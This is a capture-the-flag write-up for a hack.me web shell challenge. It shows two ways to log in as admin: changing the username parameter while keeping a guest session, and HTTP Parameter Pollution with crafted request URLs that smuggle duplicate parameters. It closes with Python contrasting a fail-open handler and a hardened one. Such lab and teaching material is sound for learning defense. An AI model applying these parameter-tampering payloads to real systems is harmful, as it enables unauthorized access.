[Challenge]: Online Shell Hack @hack.me

Challenge: Online Shell Hack
Author: TT22
Website: hack.me
Link: https://hack.me/103164/online-shell-hack.html
Description: Try logging in as “admin” by misleading the authentication system and then capture the flag.

Solution 1:

When the challenge starts, it presents this message at the top of the page: Try to log in as “admin”. Guest user is “guest” with empty password.
Following this message, I try to log in as the guest user. The login works, but when I execute the “ls” command I receive the message: Error: This command is disabled for user “guest”.
Below are the HTTP GET requests made by the JavaScript client using the guest account:
[Login – Username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=login&l=guest
[Login – Password]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=password&l=guest&p=
[Command – ls]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=guest&s=084e0343a0486ff05530df6c705c8bb4&c=ls
With the last request, I receive the error message: Error: This command is disabled for user “guest”.

As you can see, there is more than one parameter per request:

  • m: indicates the method: login, password, prompt
  • l: indicates the username
  • p: indicates the password
  • s: indicates the session id
  • c: indicates the command

To bypass the restriction on the guest user, I manipulate the request by changing only the username:

[Command – ls with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&s=084e0343a0486ff05530df6c705c8bb4&c=ls

The output is:
#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

total 0
-rwxrwxrwx 1 admin admin 21 may 1 22:45 flag.txt

prompt>

Great! Now I can see the flag.txt file, and I can try to read its content simply by using the Linux cat command.

[Command – cat flag.txt with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&s=084e0343a0486ff05530df6c705c8bb4&c=cat%20flag.txt

The next output is:
#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

i0EJKrsgbhQOKscwyNXL

prompt>

i0EJKrsgbhQOKscwyNXL is the flag!

Solution 2:

The second solution uses HPP (HTTP Parameter Pollution). With this technique, I can manipulate the CGI parameters to bypass the login.
First, I use the “admin&m=login” payload for the l parameter:

[Login – Username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=login&l=admin&m=login

As you can see, the “m” parameter is written twice.

Below is the function that validates the username:

function enterLogin(input) {
    if (getHTTP("request.php?m=login&l=" + input) == "ok") {
        login = input; // Saves the login
        currentTerminalFunction = enterPassword; // Set the next function
        terminalInPasswordMode = true; // Indicate that the user will type a password
        terminalPrint("Enter your password: ");
    } else {
        terminalPrint("<span style=\"color:#FE0000;\">Error: This login does not exists!</span><br /><br />Please enter your login: ");
    }
}

The if (getHTTP("request.php?m=login&l=" + input) == "ok") condition always returns true because the username declared with the l parameter (admin) exists. After this check, the “login” variable will contain “admin&m=login”. The login variable will be used to validate the password; for this reason I use an empty password during the login process.

[Login – Password]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=password&l=admin&m=login&p=

Using HPP, the “m” parameter is declared twice; the web application will process the last declaration: m=login.

Below is the function that validates the password:

function enterPassword(input) {
    terminalInPasswordMode = false;
    var resp = getHTTP("request.php?m=password&l=" + login + "&p=" + input);
    if (resp !== "error") {
        sessionKey = resp;
        terminalPrint("Logged in.<br />Type \"logout\" or \"exit\" to disconnect.<br /><br />prompt>");
        currentTerminalFunction = prompt;
    } else {
        terminalPrint("<span style=\"color:#FE0000;\">Error: Wrong password!</span><br /><br />Please enter your login: ");
        currentTerminalFunction = enterLogin;
    }
}

The last request always returns “ok”, so the if (resp !== "error") condition is always true.

The last step is to execute the cat command:
[Command – cat flag.txt with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&m=login&s=ok&c=cat%20flag.txt&m=prompt&s=123123

HPP helps me once more: I override the m and s parameters with a fake session ID. Below is the result:

#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

i0EJKrsgbhQOKscwyNXL

prompt>
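Both solutions work for the same two server-side reasons: the prompt handler keeps running after the session-key check fails (it logs "Wrong session key" but still executes the command as whatever the l parameter says), and repeated query parameters are resolved last-wins. The following Python is an added example, not the challenge's real request.php: a toy handler that reproduces that behaviour beside a hardened one that takes the identity from the server-side session and rejects repeated parameters. The session table, file contents and messages are constructed.

```python
from urllib.parse import parse_qs

# Constructed sample state (not the challenge backend): session key -> user,
# and a per-user "home directory". The flag value is a placeholder.
SESSIONS = {"084e0343a0486ff05530df6c705c8bb4": "guest"}
FILES = {"guest": {}, "admin": {"flag.txt": "FLAG_PLACEHOLDER"}}


def run_command(user, cmd):
    """Toy dispatcher: guest is restricted, admin may ls/cat its own files."""
    if user == "guest":
        return 'Error: This command is disabled for user "guest".'
    parts = cmd.split()
    if parts[:1] == ["ls"]:
        return " ".join(sorted(FILES.get(user, {}))) or "total 0"
    if len(parts) == 2 and parts[0] == "cat":
        return FILES.get(user, {}).get(parts[1], "No such file")
    return "Error: Unknown command"


def vulnerable_prompt(query):
    """Mirrors what the page shows: the last duplicate of a parameter wins,
    and a failed session check only prints an error (fail-open)."""
    p = {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}
    user, key, cmd = p.get("l", ""), p.get("s", ""), p.get("c", "")
    out = []
    owner = SESSIONS.get(key)
    if owner != user:
        out.append('#error_log_out#Error: Wrong session key for user "%s".\nLogged out.'
                   % (owner or "?"))
    # Defect: execution continues with the client-controlled username.
    out.append(run_command(user, cmd))
    return "\n".join(out)


def hardened_prompt(query):
    """Rejects repeated parameters and derives the identity from the session."""
    parsed = parse_qs(query, keep_blank_values=True)
    if any(len(v) != 1 for v in parsed.values()):
        return "Error: repeated parameter"
    p = {k: v[0] for k, v in parsed.items()}
    user = SESSIONS.get(p.get("s", ""))
    if user is None:
        return "Error: invalid session"  # fail closed: nothing runs
    # The l parameter is ignored entirely; the session decides who runs the command.
    return run_command(user, p.get("c", ""))
```

Feeding the page's two prompt requests to each handler shows the difference: the vulnerable one lists and reads flag.txt as admin after printing the error, while the hardened one answers "disabled for guest" for the real guest session and refuses the polluted request outright.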